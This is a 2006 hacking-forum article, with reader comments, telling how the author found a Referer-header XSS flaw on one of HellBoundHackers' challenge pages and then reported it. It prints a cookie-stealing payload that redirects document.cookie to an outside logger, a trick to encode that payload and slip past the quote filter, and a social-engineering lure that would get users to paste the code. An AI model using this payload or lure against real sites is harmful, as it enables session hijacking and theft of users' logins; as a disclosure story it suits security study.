Follow us on Twitter!
Don't judge the unknown - Grindordie
Wednesday, April 16, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 22
Guests Online: 18
Members Online: 4

Registered Members: 82811
Newest Member: IsaiahBowman
Latest Articles

xss

Arrow Image An article about how I found an xss hole in hbh



===[ How I found out my first-real XSS ]===[ 0x702ch ]==========================

Ok, actually it is not the first-real, but misconfigured guestbooks doesn\'t
count. When I started here on hbh I was in the process of realising that hacking
is not (just) about rooting boxes or manipulating servers. The words exploitation,
injection and scripting come to my mind. I googled the term \'xss\' and found a lot
of information on it. (I still have what to learn)
http://en.wikipedia/Wiki and http://ha.ckers.org are sites I recommed for you. I
first thought that xss is just the toy of the wanna be skiddies, but sonn realized
that I was in a deep mistake. I set up a cookie stealer, and experimented with it,
then I completed two realistic challenges on hts, one of which contained \'cookie
stealing\'.
Then one day when I was just bored, tired of school,... I got up on hbh and went
to the realistic 8 page. Well it says that I should use a proxy. Nothing interesting
...but wait!It says that they log my referrer and it is printed in plain-text to the
html source. I changed my referrer with RefControl to: <script>alert(\'xss\');</script>
and nothing happened! But I was cool enough to check the source and I noticed that it
doesn\'t escaped the < and > tags! It only escaped the \',\" and / characters! Ok I tried
this: <script>a=1337;alert(a);</script> and it worked! I was so happy that I found
an xss hole. (or just found that the referrer isn\'t filtered for special characters)
I wasn\'t able to modify the page or add any content to it, but I didn\'t give up and
checked ha.ckers.org and there I found an interesting function:
String.fromCharCode(88,83,83); it expands to \"XSS\". The numbers are the ascii values
of the characters. Now I can construct strings without \' or \". But what can I do
with this? Well I tried to redirect the page to my cookie stealer! And it worked.
To fastly construct any string I wrote a small C program that outputs a string in
ascii each character seperated by commas. So I put this string into it:
<script>window.location=\'http://my.com/cookie_stealer.php?c=\'+docu<i></i>ment.cookie</script>
It expanded to a couple of numbers which I pasted to my referrer:
<script>docu<i></i>ment.write(String.fromCharCode(numbers here like this x,x,x,x);</script>
I refreshed and it took me to my site, I checked the log and yes there were my cookies!
You may think that this was useless but let me explain how could I use this!(SE) Say I
start a new thread and say that I have found an easter egg in one of hbh\'s realistic
missions! To view it install RefControl [link here] and paste this code into it:
code here
It is a series of JS function calls and their arguments and you must use this form
because \' and \" are filtered.
After that how many of you was to check the code? And how many was to use it!
And what I would have are some nice cookies. But instead of doing this all, I reported
the bug/exploit to Mr_Cheese and he quickly fixed it. Later when I asked him about the
HoF he said that with this I can\'t get into it. (cookie stealing and SE doesn\'t count)
Okay, said I, no problem I don\'t wrote this article to force myself in the HoF, I
understand him. This is just part of the story. And this is the big end!

Comments

netfishon October 20 2006 - 17:20:04
CRITICISM 2. Use spacing, and line breaks [ENTER] 3. Good job, tho, dude -- keep writing.
bl4ckc4ton October 20 2006 - 17:20:25
Not too bad. 9/10 BC
BluMooseon October 20 2006 - 19:52:38
Add some spacing, may make it little more readable Wink But great info nonetheless Grin
AldarHawkon October 20 2006 - 21:33:42
well written. not too much of a NEW hack just bad coding on the coder of Real 8 Wink But Nice...7/10
mozzeron October 20 2006 - 23:00:26
Just like to say that I think that there is more damage which can be done with XSS than cookie stealing which I think Mr_Cheese sometimes ignores, CSRF. I may write and article on it actually
mozzeron October 20 2006 - 23:00:26
Just like to say that I think that there is more damage which can be done with XSS than cookie stealing which I think Mr_Cheese sometimes ignores, CSRF. I may write and article on it actually
mozzeron October 20 2006 - 23:00:29
Just like to say that I think that there is more damage which can be done with XSS than cookie stealing which I think Mr_Cheese sometimes ignores, CSRF. I may write and article on it actually
mozzeron October 20 2006 - 23:00:31
Just like to say that I think that there is more damage which can be done with XSS than cookie stealing which I think Mr_Cheese sometimes ignores, CSRF. I may write and article on it actually
system_meltdownon October 20 2006 - 23:37:15
Dude, that thing about real8, I got HoF for that which is probably why you didn't Wink
chislamon October 21 2006 - 01:12:19
lol this isn't new, system did it.... lol
thatsflashon October 29 2006 - 12:14:15
:evil:
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.